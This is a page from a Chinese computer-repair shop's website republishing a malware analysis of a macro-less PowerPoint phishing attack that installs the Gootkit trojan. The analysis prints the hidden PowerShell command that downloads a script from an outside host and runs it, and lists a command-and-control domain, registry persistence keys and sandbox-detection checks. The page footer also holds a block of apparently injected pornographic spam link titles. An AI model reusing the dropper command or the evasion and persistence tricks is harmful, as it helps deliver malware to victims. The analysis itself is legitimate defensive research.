錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
新型PPT釣魚攻擊分析(含gootkit木馬詳細分析)

作者: 佚名  日期:2017-06-18 07:51:33   來源: 本站整理

 1 概述
最近出現了一種新型的PPT釣魚攻擊方式,該種釣魚攻擊方式不需要宏就能實現執行powershell的功能,通過網絡下載gootkit木馬進行控制。
2 分析
樣本 MD5:3bff3e4fec2b6030c89e792c05f049fc
在拿到樣本我們放到虛擬機中進行執行,可以看到以下,但是這并不會觸發攻擊
當我們用F5放映這個文檔后,并把鼠標放到 Loading…Please wait 這個上面,就可以看到如下的畫面,提示我們要啟動一個外部程序
這個時候我們在點擊啟動之后,會看見一個powershell的窗口一閃而過,可以知道樣本執行了一段powershell的腳本

我們將樣本后綴名改為zip,看看這段powershell 代碼在何處,我們最終在ppt\slides中找到了這段powershell腳本

我們在slide1.xml.rels 中找到這段powershell腳本,我們可以看到Id為rId2,
我們在對應的slide1.xml  中id為rId2  對應的動作位為,當鼠標覆蓋時,就觸發這個外部事件
id="rId2"action="ppaction://program"/>

我們來看看這段powershell 腳本(已還原),可以看到是下載一個php文件放到臨時文件夾,并重命名為ii.jse
powershell -NoP -NonI -W Hidden -ExecBypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://'+'cccn.nl/'+'c.php',\"$env:temp\ii.jse\");Invoke-Item \"$env:temp\ii.jse\""
我們可以看到這個js  文件,這個文件是經過強混淆的作用是下載個exe文件

我們來詳細分析下下載到的PE文件
MD5 
13cdbd8c31155610b628423dc2720419 
編譯時間 
2017年5月27日14點 
編譯器信息 
Microsoft Visual C++ ver. 8.0 
殼信息 
無殼 
下圖為樣本的大致流程

在樣本的開始階段,做了些反模擬機的工作,比如一些錯誤的函數調用,看返回值是否被修改,執行很多無效指令,來達到模擬機指令的閾值等等

我們來看看這個樣本中的sub_41E160中的無效指令

之后一個大的sleep來對抗沙箱,因為很多沙箱是有時間范圍的

之后在解密出一段shellcode進行執行,這段shellcode的主要作用就是解密出一個pe文件然后加載運行,解密出的PE文件

將這個PE文件dump出來,看以下基本信息
MD5 
89509761e2636e2b8a1c6f7ec8823b8f 
編譯器時間 
2011-04-11 02:39:24 
編譯器類型 
Microsoft Visual C++ ver. ~6.0~7.10 – Linker 10 – Visual 2010 
樣本首先會獲取當前樣本名稱和mstsc.exe比較,如果不相同,則進入注入模塊

樣本首先會創建mstsc.exe

然后通過ZwCreateSection和ZwMapViewOfSection 進行注入,并在注入后,獲取啟動地址并進行修改

我們手動附加,進行修改,然后修改EIP,進行調試,我們將開始地址修改為下面的樣子

由于和原文件代碼相同,我們直接到文件名比較的地方,這里比較相同后,首先會獲取進程的權限
如果判斷是低權限的進程,則會通過ShellExecuteEx  使用管理員權限啟動

之后在比較當前進程不是IE和不是任務進程后,打開BIOS注冊表,查找是否在虛擬機中

并從系統信息中找到沙箱的蛛絲馬跡這個是尋找Sandbox

查找BOCHS

查找的沙箱還有  VBOX 、QEMU、SMCI、Vmware、FTNT-1、VirtualBox、
如果查找到沙箱則進入死循環

然后拷貝自身到如下目錄下,重命名位mqnets.exe,并執行

并刪除自身

我們看看在拷貝到IE目錄下樣本會做些什么,在這里比較是在IE目錄下的時候,會發生跳轉

可以通過偽代碼可以發現在通過比較后。會執行一個線程,我們看看這個線程

開頭還是一段判斷自己是否在虛擬機中

設置了4個環境變量分別是
Standalonemtm  true
Vendor_id exe_scheduler_3333
Mainprocessoverride  svchost.exe
RandomListenPortBase  6000

這個線程的主要作用是開啟下面的5個線程

我們首先看第一個線程,主要作用是連接一個網址
網址為  web.1901ospinosct.com 


在連接時候,還包括了探測IE代理的設置,如果發現,進行設置

關閉重定向和加入查詢認證(SSL)

將接收的文件內容放到注冊中

注冊表為  HKEY_CURRENT_USER\Software\binaryImage32_0
HKEY_CURRENT_USER\Software\binaryImage32_1

第二個線程主要是將第一步下載的創建成文件

將IE的保護模式設置位禁用
第三個線程將文件進行注入

第四個線程主要是保持持久化
創建inf文件

設置啟動
使用  IEAK\GroupPolicy\PendingGPOs  key  去保持持久化

第五個線程主要是判斷Temp文件是否如下圖的文件,如果有殼殺死自身,并刪除自身


總結
樣本在對抗沙箱和模擬機中有很強的針對性,在持久話方面也很獨特,值得研究一下
 



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 亚洲一区无码精品色| 无码人妻少妇久久中文字幕蜜桃 | 亚洲av中文无码| 无码日韩人妻AV一区免费l| 中文字幕无码av激情不卡久久| 国产在线拍偷自揄拍无码| 亚洲av无码偷拍在线观看| 国产精品无码午夜福利| 少妇人妻av无码专区| 无码h黄动漫在线播放网站| 成人免费a级毛片无码网站入口| 无码人妻视频一区二区三区| 久久99久久无码毛片一区二区| 无码熟妇人妻AV在线影院| 无码精品人妻一区二区三区中| 日韩中文无码有码免费视频| 精品少妇人妻av无码久久| 国产精品ⅴ无码大片在线看| 日韩精品无码久久一区二区三| 亚洲另类无码一区二区三区| 无码囯产精品一区二区免费| 亚洲AV无码不卡在线播放| 国产无遮挡无码视频免费软件| 亚洲AV无码一区二区三区在线观看| 无码人妻精品一区二区三区99性 | 国产综合无码一区二区色蜜蜜| 91精品国产综合久久四虎久久无码一级| 国产日韩AV免费无码一区二区三区| 午夜麻豆国产精品无码| 免费无码A片一区二三区| 无码人妻精品一区二区三区蜜桃| 久久亚洲精品成人av无码网站 | 人妻少妇伦在线无码专区视频| 中文一国产一无码一日韩| 亚洲日韩精品无码专区网址| 亚洲第一极品精品无码久久 | 亚洲国产精品无码中文字| 国精无码欧精品亚洲一区| 亚洲精品无码mv在线观看网站 | 亚洲欧洲免费无码| 午夜寂寞视频无码专区|